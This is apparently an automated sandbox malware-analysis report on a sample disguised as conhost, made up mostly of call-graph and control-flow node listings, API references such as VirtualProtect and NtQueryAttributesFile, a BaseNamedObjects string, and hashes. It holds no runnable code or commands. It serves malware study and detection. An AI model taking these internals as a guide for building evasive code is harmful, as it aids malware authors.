2344 140001503 2343->2344 2345 140001394 2 API calls 2343->2345 2346 140001394 2 API calls 2344->2346 2345->2344 2347 14000150d 2346->2347 2348 140001394 2 API calls 2347->2348 2349 140001512 2348->2349 2350 140001394 2 API calls 2349->2350 2351 140001521 2350->2351 2352 140001394 2 API calls 2351->2352 2353 140001530 2352->2353 2354 140001394 2 API calls 2353->2354 2355 14000153f 2354->2355 2356 140001394 2 API calls 2355->2356 2357 14000154e 2356->2357 2358 140001394 2 API calls 2357->2358 2359 14000155d 2358->2359 2360 140001394 2 API calls 2359->2360 2361 14000156c 2360->2361 2362 140001394 2 API calls 2361->2362 2363 14000157b 2362->2363 2364 140001394 2 API calls 2363->2364 2365 14000158a 2364->2365 2366 140001394 2 API calls 2365->2366 2367 140001599 2366->2367 2368 140001394 2 API calls 2367->2368 2369 1400015a8 2368->2369 2370 140001394 2 API calls 2369->2370 2371 1400015b7 2370->2371 2372 140001394 2 API calls 2371->2372 2373 1400015c6 2372->2373 2374 140001394 2 API calls 2373->2374 2375 1400015d5 2374->2375 2376 140001394 2 API calls 2375->2376 2377 1400015e4 2376->2377 2378 140001394 2 API calls 2377->2378 2379 1400015f3 2378->2379 2379->2177 2381 140001394 2 API calls 2380->2381 2382 14000147c 2381->2382 2383 140001394 2 API calls 2382->2383 2384 14000148b 2383->2384 2385 140001394 2 API calls 2384->2385 2386 14000149a 2385->2386 2387 140001394 2 API calls 2386->2387 2388 1400014a9 2387->2388 2389 140001394 2 API calls 2388->2389 2390 1400014b8 2389->2390 2391 140001394 2 API calls 2390->2391 2392 1400014c7 2391->2392 2393 140001394 2 API calls 2392->2393 2394 1400014d6 2393->2394 2395 1400014e5 2394->2395 2396 140001394 2 API calls 2394->2396 2397 140001394 2 API calls 2395->2397 2396->2395 2398 1400014ef 2397->2398 2399 1400014f4 2398->2399 2400 140001394 2 API calls 2398->2400 2401 140001394 2 API calls 2399->2401 2400->2399 2402 1400014fe 2401->2402 2403 140001503 2402->2403 2404 140001394 2 API calls 2402->2404 2405 140001394 2 API calls 2403->2405 2404->2403 2406 14000150d 2405->2406 2407 140001394 2 API calls 2406->2407 2408 140001512 2407->2408 2409 140001394 2 API calls 2408->2409 2410 140001521 2409->2410 2411 140001394 2 API calls 2410->2411 2412 140001530 2411->2412 2413 140001394 2 API calls 2412->2413 2414 14000153f 2413->2414 2415 140001394 2 API calls 2414->2415 2416 14000154e 2415->2416 2417 140001394 2 API calls 2416->2417 2418 14000155d 2417->2418 2419 140001394 2 API calls 2418->2419 2420 14000156c 2419->2420 2421 140001394 2 API calls 2420->2421 2422 14000157b 2421->2422 2423 140001394 2 API calls 2422->2423 2424 14000158a 2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001599 2425->2426 2427 140001394 2 API calls 2426->2427 2428 1400015a8 2427->2428 2429 140001394 2 API calls 2428->2429 2430 1400015b7 2429->2430 2431 140001394 2 API calls 2430->2431 2432 1400015c6 2431->2432 2433 140001394 2 API calls 2432->2433 2434 1400015d5 2433->2434 2435 140001394 2 API calls 2434->2435 2436 1400015e4 2435->2436 2437 140001394 2 API calls 2436->2437 2438 1400015f3 2437->2438 2438->2212 2439 140001530 2438->2439 2440 140001394 2 API calls 2439->2440 2441 14000153f 2440->2441 2442 140001394 2 API calls 2441->2442 2443 14000154e 2442->2443 2444 140001394 2 API calls 2443->2444 2445 14000155d 2444->2445 2446 140001394 2 API calls 2445->2446 2447 14000156c 2446->2447 2448 140001394 2 API calls 2447->2448 2449 14000157b 2448->2449 2450 140001394 2 API calls 2449->2450 2451 14000158a 2450->2451 2452 140001394 2 API calls 2451->2452 2453 140001599 2452->2453 2454 140001394 2 API calls 2453->2454 2455 1400015a8 2454->2455 2456 140001394 2 API calls 2455->2456 2457 1400015b7 2456->2457 2458 140001394 2 API calls 2457->2458 2459 1400015c6 2458->2459 2460 140001394 2 API calls 2459->2460 2461 1400015d5 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015e4 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015f3 2464->2465 2465->2203 2465->2204 2467 140001394 2 API calls 2466->2467 2468 1400014b8 2467->2468 2469 140001394 2 API calls 2468->2469 2470 1400014c7 2469->2470 2471 140001394 2 API calls 2470->2471 2472 1400014d6 2471->2472 2473 1400014e5 2472->2473 2474 140001394 2 API calls 2472->2474 2475 140001394 2 API calls 2473->2475 2474->2473 2476 1400014ef 2475->2476 2477 1400014f4 2476->2477 2478 140001394 2 API calls 2476->2478 2479 140001394 2 API calls 2477->2479 2478->2477 2480 1400014fe 2479->2480 2481 140001503 2480->2481 2482 140001394 2 API calls 2480->2482 2483 140001394 2 API calls 2481->2483 2482->2481 2484 14000150d 2483->2484 2485 140001394 2 API calls 2484->2485 2486 140001512 2485->2486 2487 140001394 2 API calls 2486->2487 2488 140001521 2487->2488 2489 140001394 2 API calls 2488->2489 2490 140001530 2489->2490 2491 140001394 2 API calls 2490->2491 2492 14000153f 2491->2492 2493 140001394 2 API calls 2492->2493 2494 14000154e 2493->2494 2495 140001394 2 API calls 2494->2495 2496 14000155d 2495->2496 2497 140001394 2 API calls 2496->2497 2498 14000156c 2497->2498 2499 140001394 2 API calls 2498->2499 2500 14000157b 2499->2500 2501 140001394 2 API calls 2500->2501 2502 14000158a 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001599 2503->2504 2505 140001394 2 API calls 2504->2505 2506 1400015a8 2505->2506 2507 140001394 2 API calls 2506->2507 2508 1400015b7 2507->2508 2509 140001394 2 API calls 2508->2509 2510 1400015c6 2509->2510 2511 140001394 2 API calls 2510->2511 2512 1400015d5 2511->2512 2513 140001394 2 API calls 2512->2513 2514 1400015e4 2513->2514 2515 140001394 2 API calls 2514->2515 2516 1400015f3 2515->2516 2516->2208 2517 140001440 2516->2517 2518 140001394 2 API calls 2517->2518 2519 14000144f 2518->2519 2520 140001394 2 API calls 2519->2520 2521 14000145e 2520->2521 2522 140001394 2 API calls 2521->2522 2523 14000146d 2522->2523 2524 140001394 2 API calls 2523->2524 2525 14000147c 2524->2525 2526 140001394 2 API calls 2525->2526 2527 14000148b 2526->2527 2528 140001394 2 API calls 2527->2528 2529 14000149a 2528->2529 2530 140001394 2 API calls 2529->2530 2531 1400014a9 2530->2531 2532 140001394 2 API calls 2531->2532 2533 1400014b8 2532->2533 2534 140001394 2 API calls 2533->2534 2535 1400014c7 2534->2535 2536 140001394 2 API calls 2535->2536 2537 1400014d6 2536->2537 2538 1400014e5 2537->2538 2539 140001394 2 API calls 2537->2539 2540 140001394 2 API calls 2538->2540 2539->2538 2541 1400014ef 2540->2541 2542 1400014f4 2541->2542 2543 140001394 2 API calls 2541->2543 2544 140001394 2 API calls 2542->2544 2543->2542 2545 1400014fe 2544->2545 2546 140001503 2545->2546 2547 140001394 2 API calls 2545->2547 2548 140001394 2 API calls 2546->2548 2547->2546 2549 14000150d 2548->2549 2550 140001394 2 API calls 2549->2550 2551 140001512 2550->2551 2552 140001394 2 API calls 2551->2552 2553 140001521 2552->2553 2554 140001394 2 API calls 2553->2554 2555 140001530 2554->2555 2556 140001394 2 API calls 2555->2556 2557 14000153f 2556->2557 2558 140001394 2 API calls 2557->2558 2559 14000154e 2558->2559 2560 140001394 2 API calls 2559->2560 2561 14000155d 2560->2561 2562 140001394 2 API calls 2561->2562 2563 14000156c 2562->2563 2564 140001394 2 API calls 2563->2564 2565 14000157b 2564->2565 2566 140001394 2 API calls 2565->2566 2567 14000158a 2566->2567 2568 140001394 2 API calls 2567->2568 2569 140001599 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015a8 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015b7 2572->2573 2574 140001394 2 API calls 2573->2574 2575 1400015c6 2574->2575 2576 140001394 2 API calls 2575->2576 2577 1400015d5 2576->2577 2578 140001394 2 API calls 2577->2578 2579 1400015e4 2578->2579 2580 140001394 2 API calls 2579->2580 2581 1400015f3 2580->2581 2581->2208 2581->2215 2583 1400014e5 2582->2583 2584 140001394 2 API calls 2582->2584 2585 140001394 2 API calls 2583->2585 2584->2583 2586 1400014ef 2585->2586 2587 1400014f4 2586->2587 2588 140001394 2 API calls 2586->2588 2589 140001394 2 API calls 2587->2589 2588->2587 2590 1400014fe 2589->2590 2591 140001503 2590->2591 2592 140001394 2 API calls 2590->2592 2593 140001394 2 API calls 2591->2593 2592->2591 2594 14000150d 2593->2594 2595 140001394 2 API calls 2594->2595 2596 140001512 2595->2596 2597 140001394 2 API calls 2596->2597 2598 140001521 2597->2598 2599 140001394 2 API calls 2598->2599 2600 140001530 2599->2600 2601 140001394 2 API calls 2600->2601 2602 14000153f 2601->2602 2603 140001394 2 API calls 2602->2603 2604 14000154e 2603->2604 2605 140001394 2 API calls 2604->2605 2606 14000155d 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000156c 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000157b 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000158a 2611->2612 2613 140001394 2 API calls 2612->2613 2614 140001599 2613->2614 2615 140001394 2 API calls 2614->2615 2616 1400015a8 2615->2616 2617 140001394 2 API calls 2616->2617 2618 1400015b7 2617->2618 2619 140001394 2 API calls 2618->2619 2620 1400015c6 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015d5 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015e4 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015f3 2625->2626 2626->2235 2628 140001394 2 API calls 2627->2628 2629 14000158a 2628->2629 2630 140001394 2 API calls 2629->2630 2631 140001599 2630->2631 2632 140001394 2 API calls 2631->2632 2633 1400015a8 2632->2633 2634 140001394 2 API calls 2633->2634 2635 1400015b7 2634->2635 2636 140001394 2 API calls 2635->2636 2637 1400015c6 2636->2637 2638 140001394 2 API calls 2637->2638 2639 1400015d5 2638->2639 2640 140001394 2 API calls 2639->2640 2641 1400015e4 2640->2641 2642 140001394 2 API calls 2641->2642 2643 1400015f3 2642->2643 2643->2235 2645 140001394 2 API calls 2644->2645 2646 1400015b7 2645->2646 2647 140001394 2 API calls 2646->2647 2648 1400015c6 2647->2648 2649 140001394 2 API calls 2648->2649 2650 1400015d5 2649->2650 2651 140001394 2 API calls 2650->2651 2652 1400015e4 2651->2652 2653 140001394 2 API calls 2652->2653 2654 1400015f3 2653->2654 2654->2235 2656 140001394 2 API calls 2655->2656 2657 140001530 2656->2657 2658 140001394 2 API calls 2657->2658 2659 14000153f 2658->2659 2660 140001394 2 API calls 2659->2660 2661 14000154e 2660->2661 2662 140001394 2 API calls 2661->2662 2663 14000155d 2662->2663 2664 140001394 2 API calls 2663->2664 2665 14000156c 2664->2665 2666 140001394 2 API calls 2665->2666 2667 14000157b 2666->2667 2668 140001394 2 API calls 2667->2668 2669 14000158a 2668->2669 2670 140001394 2 API calls 2669->2670 2671 140001599 2670->2671 2672 140001394 2 API calls 2671->2672 2673 1400015a8 2672->2673 2674 140001394 2 API calls 2673->2674 2675 1400015b7 2674->2675 2676 140001394 2 API calls 2675->2676 2677 1400015c6 2676->2677 2678 140001394 2 API calls 2677->2678 2679 1400015d5 2678->2679 2680 140001394 2 API calls 2679->2680 2681 1400015e4 2680->2681 2682 140001394 2 API calls 2681->2682 2683 1400015f3 2682->2683 2683->2235 2685 140001394 2 API calls 2684->2685 2686 140001431 2685->2686 2687 140001394 2 API calls 2686->2687 2688 140001440 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000144f 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000145e 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000146d 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000147c 2695->2696 2697 140001394 2 API calls 2696->2697 2698 14000148b 2697->2698 2699 140001394 2 API calls 2698->2699 2700 14000149a 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400014a9 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400014b8 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400014c7 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400014d6 2707->2708 2709 1400014e5 2708->2709 2710 140001394 2 API calls 2708->2710 2711 140001394 2 API calls 2709->2711 2710->2709 2712 1400014ef 2711->2712 2713 1400014f4 2712->2713 2714 140001394 2 API calls 2712->2714 2715 140001394 2 API calls 2713->2715 2714->2713 2716 1400014fe 2715->2716 2717 140001503 2716->2717 2718 140001394 2 API calls 2716->2718 2719 140001394 2 API calls 2717->2719 2718->2717 2720 14000150d 2719->2720 2721 140001394 2 API calls 2720->2721 2722 140001512 2721->2722 2723 140001394 2 API calls 2722->2723 2724 140001521 2723->2724 2725 140001394 2 API calls 2724->2725 2726 140001530 2725->2726 2727 140001394 2 API calls 2726->2727 2728 14000153f 2727->2728 2729 140001394 2 API calls 2728->2729 2730 14000154e 2729->2730 2731 140001394 2 API calls 2730->2731 2732 14000155d 2731->2732 2733 140001394 2 API calls 2732->2733 2734 14000156c 2733->2734 2735 140001394 2 API calls 2734->2735 2736 14000157b 2735->2736 2737 140001394 2 API calls 2736->2737 2738 14000158a 2737->2738 2739 140001394 2 API calls 2738->2739 2740 140001599 2739->2740 2741 140001394 2 API calls 2740->2741 2742 1400015a8 2741->2742 2743 140001394 2 API calls 2742->2743 2744 1400015b7 2743->2744 2745 140001394 2 API calls 2744->2745 2746 1400015c6 2745->2746 2747 140001394 2 API calls 2746->2747 2748 1400015d5 2747->2748 2749 140001394 2 API calls 2748->2749 2750 1400015e4 2749->2750 2751 140001394 2 API calls 2750->2751 2752 1400015f3 2751->2752 2752->2235 2754 140001394 2 API calls 2753->2754 2755 140001440 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000144f 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000145e 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000146d 2760->2761 2762 140001394 2 API calls 2761->2762 2763 14000147c 2762->2763 2764 140001394 2 API calls 2763->2764 2765 14000148b 2764->2765 2766 140001394 2 API calls 2765->2766 2767 14000149a 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400014a9 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400014b8 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400014c7 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400014d6 2774->2775 2776 1400014e5 2775->2776 2777 140001394 2 API calls 2775->2777 2778 140001394 2 API calls 2776->2778 2777->2776 2779 1400014ef 2778->2779 2780 1400014f4 2779->2780 2781 140001394 2 API calls 2779->2781 2782 140001394 2 API calls 2780->2782 2781->2780 2783 1400014fe 2782->2783 2784 140001503 2783->2784 2785 140001394 2 API calls 2783->2785 2786 140001394 2 API calls 2784->2786 2785->2784 2787 14000150d 2786->2787 2788 140001394 2 API calls 2787->2788 2789 140001512 2788->2789 2790 140001394 2 API calls 2789->2790 2791 140001521 2790->2791 2792 140001394 2 API calls 2791->2792 2793 140001530 2792->2793 2794 140001394 2 API calls 2793->2794 2795 14000153f 2794->2795 2796 140001394 2 API calls 2795->2796 2797 14000154e 2796->2797 2798 140001394 2 API calls 2797->2798 2799 14000155d 2798->2799 2800 140001394 2 API calls 2799->2800 2801 14000156c 2800->2801 2802 140001394 2 API calls 2801->2802 2803 14000157b 2802->2803 2804 140001394 2 API calls 2803->2804 2805 14000158a 2804->2805 2806 140001394 2 API calls 2805->2806 2807 140001599 2806->2807 2808 140001394 2 API calls 2807->2808 2809 1400015a8 2808->2809 2810 140001394 2 API calls 2809->2810 2811 1400015b7 2810->2811 2812 140001394 2 API calls 2811->2812 2813 1400015c6 2812->2813 2814 140001394 2 API calls 2813->2814 2815 1400015d5 2814->2815 2816 140001394 2 API calls 2815->2816 2817 1400015e4 2816->2817 2818 140001394 2 API calls 2817->2818 2819 1400015f3 2818->2819 2819->2235

                                                                                                                                Callgraph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                • Opacity -> Relevance
                                                                                                                                • Disassembly available
                                                                                                                                callgraph 0 Function_00000001400059E1 1 Function_00000001400058E1 2 Function_00000001400057E1 3 Function_0000000140001AE4 33 Function_0000000140001D40 3->33 73 Function_0000000140001BA0 3->73 4 Function_00000001400014E5 68 Function_0000000140001394 4->68 5 Function_00000001400010F0 6 Function_00000001400030F1 7 Function_00000001400014F4 7->68 8 Function_0000000140002500 9 Function_0000000140001800 63 Function_0000000140002290 9->63 10 Function_0000000140001000 11 Function_0000000140001E00 10->11 37 Function_0000000140001750 10->37 79 Function_0000000140001FB0 10->79 86 Function_0000000140001FC0 10->86 12 Function_0000000140002F00 53 Function_0000000140001370 12->53 13 Function_0000000140005801 14 Function_0000000140001503 14->68 15 Function_0000000140001404 15->68 16 Function_0000000140002104 17 Function_0000000140001E10 18 Function_0000000140003110 19 Function_0000000140005911 20 Function_0000000140001512 20->68 21 Function_0000000140002420 22 Function_0000000140002320 23 Function_0000000140001521 23->68 24 Function_0000000140005A21 25 Function_0000000140001422 25->68 26 Function_0000000140001530 26->68 27 Function_0000000140003130 28 Function_0000000140001431 28->68 29 Function_0000000140005831 30 Function_000000014000153F 30->68 31 Function_0000000140001440 31->68 32 Function_0000000140001140 47 Function_0000000140001160 32->47 33->63 34 Function_0000000140001F47 54 Function_0000000140001870 34->54 35 Function_0000000140002050 36 Function_0000000140001650 38 Function_0000000140003150 38->12 38->14 38->23 38->25 38->26 38->28 38->30 38->31 43 Function_000000014000145E 38->43 45 Function_0000000140002660 38->45 50 Function_000000014000156C 38->50 51 Function_000000014000146D 38->51 38->53 58 Function_000000014000157B 38->58 72 Function_0000000140005AA0 38->72 75 Function_00000001400015A8 38->75 76 Function_00000001400014A9 38->76 85 Function_00000001400016C0 38->85 97 Function_00000001400014D6 38->97 99 Function_00000001400026E0 38->99 39 Function_0000000140003051 40 Function_0000000140005851 41 Function_0000000140005951 42 Function_000000014000155D 42->68 43->68 44 Function_0000000140002460 46 Function_0000000140005D60 46->72 47->38 47->47 47->54 59 Function_0000000140001880 47->59 62 Function_0000000140001F90 47->62 47->85 48 Function_0000000140001760 100 Function_00000001400020E0 48->100 49 Function_0000000140001E65 49->54 50->68 51->68 52 Function_000000014000216F 55 Function_0000000140001A70 55->33 55->73 56 Function_0000000140003070 57 Function_0000000140005871 58->68 59->21 59->33 59->45 59->73 60 Function_0000000140005A80 61 Function_0000000140005781 64 Function_0000000140002590 65 Function_0000000140003090 66 Function_0000000140002691 67 Function_0000000140005891 68->46 77 Function_0000000140005AB0 68->77 69 Function_0000000140002194 69->54 70 Function_000000014000219E 71 Function_0000000140001FA0 73->33 78 Function_00000001400023B0 73->78 93 Function_00000001400024D0 73->93 74 Function_00000001400057A1 75->68 76->68 77->72 80 Function_00000001400022B0 81 Function_00000001400026B0 82 Function_00000001400030B1 83 Function_00000001400058B1 84 Function_0000000140001AB3 84->33 84->73 87 Function_00000001400058C0 88 Function_00000001400057C1 89 Function_00000001400059C1 90 Function_0000000140001AC3 90->33 90->73 91 Function_00000001400014C7 91->68 92 Function_00000001400026D0 94 Function_00000001400017D0 95 Function_0000000140001FD0 96 Function_0000000140001AD4 96->33 96->73 97->68 98 Function_00000001400022E0 99->4 99->7 99->14 99->20 99->42 99->43 99->45 99->53 99->72 99->76 99->91 101 Function_00000001400017E0 101->100

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • NtQueryAttributesFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000028.00000002.4195440790.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                • Associated: 00000028.00000002.4195398685.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195481730.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195524350.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195555772.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_40_2_140000000_conhost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFileQuery
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2106648053-0
                                                                                                                                • Opcode ID: f55b75a42ba742ff66446f778846a6b7bb42d2851d26ad5f09de16630c5a37b5
                                                                                                                                • Instruction ID: e01ed9b63ef7c5920134c4e85c14ad27842d35840c28d74b04fb6c154e59ead0
                                                                                                                                • Opcode Fuzzy Hash: f55b75a42ba742ff66446f778846a6b7bb42d2851d26ad5f09de16630c5a37b5
                                                                                                                                • Instruction Fuzzy Hash: 6CF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC843735DB3CC190CB80
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 323 140002953-14000297b call 1400014c7 316->323 324 140002864-140002873 316->324 318->316 319 140002780-140002787 318->319 321 140002789-140002792 319->321 322 140002750-140002752 319->322 326 140002794-1400027ab 321->326 327 1400027f8-1400027fb 321->327 325 14000275a-14000276e 322->325 339 140002986-1400029c8 call 140001503 call 140005aa0 323->339 340 14000297d 323->340 329 140002eb7-140002ef4 call 140001370 324->329 330 140002879-140002888 324->330 325->316 325->318 333 1400027f5 326->333 334 1400027ad-1400027c2 326->334 327->325 331 1400028e4-14000294e wcsncmp call 1400014e5 330->331 332 14000288a-1400028dd 330->332 331->323 332->331 333->327 338 1400027d0-1400027d7 334->338 342 1400027d9-1400027f3 338->342 343 140002800-140002809 338->343 349 140002e49-140002e84 call 140001370 339->349 350 1400029ce-1400029d5 339->350 340->339 342->333 342->338 343->325 353 1400029d7-140002a0c 349->353 358 140002e8a 349->358 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 354 140002a45-140002a76 wcslen 352->354 355 140002a78-140002aa5 352->355 353->352 357 140002aa8-140002abf wcslen 354->357 355->357 359 140002ac5-140002ad8 357->359 360 140002e8f-140002eab call 140001370 357->360 358->352 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->329 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000028.00000002.4195440790.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                • Associated: 00000028.00000002.4195398685.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195481730.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195524350.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195555772.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_40_2_140000000_conhost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: wcslen$wcscatwcscpywcsncmp
                                                                                                                                • String ID: 0$X$\BaseNamedObjects\uchktukdluuckerpcuvzpcoi$`
                                                                                                                                • API String ID: 597572034-3704989803
                                                                                                                                • Opcode ID: 3133f7f296004b85e16c060a60531445a6f73afb539f6510134cde2c3de23bc7
                                                                                                                                • Instruction ID: 2e9d5e220b649681f3bc344adc42336b8e25d3988b27c92710e4e487b508a577
                                                                                                                                • Opcode Fuzzy Hash: 3133f7f296004b85e16c060a60531445a6f73afb539f6510134cde2c3de23bc7
                                                                                                                                • Instruction Fuzzy Hash: B81248B2618BC081E762CB16F8443EA77A4F789794F414215EBA957BF5EF78C189C700
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000028.00000002.4195440790.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                • Associated: 00000028.00000002.4195398685.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195481730.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195524350.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195555772.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_40_2_140000000_conhost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2643109117-0
                                                                                                                                • Opcode ID: 5d0fc5cb5312a86aea69d86366c04c8dca501517c33cfb13c8926ddb1e835d98
                                                                                                                                • Instruction ID: 6da89aac2756394a8f90a5fb187dfef0bda678cff9b9221eeeed913521154361
                                                                                                                                • Opcode Fuzzy Hash: 5d0fc5cb5312a86aea69d86366c04c8dca501517c33cfb13c8926ddb1e835d98
                                                                                                                                • Instruction Fuzzy Hash: 3E5113B1601A4485FB16EF27F9947EA27A5AB8DBD0F449121FB4D873B6DE38C4958300
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 431 140001be9-140001bf1 428->431 430 140001c0c-140001c17 call 1400023b0 429->430 438 140001cf4-140001cfe call 140001d40 430->438 439 140001c1d-140001c6c call 1400024d0 VirtualQuery 430->439 432 140001bf3-140001c02 431->432 433 140001be0-140001be7 431->433 432->433 435 140001c04 432->435 433->430 433->431 437 140001cd7-140001cf3 memcpy 435->437 442 140001d03-140001d1e call 140001d40 438->442 439->442 445 140001c72-140001c79 439->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 452 140001cd1 447->452 453 140001c80-140001c83 447->453 449 140001ca4-140001ccf VirtualProtect 448->449 450 140001c99-140001c9c 448->450 449->446 449->452 450->452 454 140001c9e 450->454 452->437 453->452 456 140001c85-140001c8a 453->456 454->449 456->452 457 140001c8c 456->457 457->454
                                                                                                                                APIs
                                                                                                                                • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                                                                                • memcpy.MSVCRT ref: 0000000140001CE0
                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000028.00000002.4195440790.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                • Associated: 00000028.00000002.4195398685.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195481730.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195524350.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195555772.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_40_2_140000000_conhost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                                                • API String ID: 2595394609-2123141913
                                                                                                                                • Opcode ID: fa23354802fc419f721e8d6d99bf42313c076893da16dc773a4833f7a127173c
                                                                                                                                • Instruction ID: 983f2cd7954f52bd80517b4e6a6dcb45ec3260e26c9f0eed5b1464496079116d
                                                                                                                                • Opcode Fuzzy Hash: fa23354802fc419f721e8d6d99bf42313c076893da16dc773a4833f7a127173c
                                                                                                                                • Instruction Fuzzy Hash: 174143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
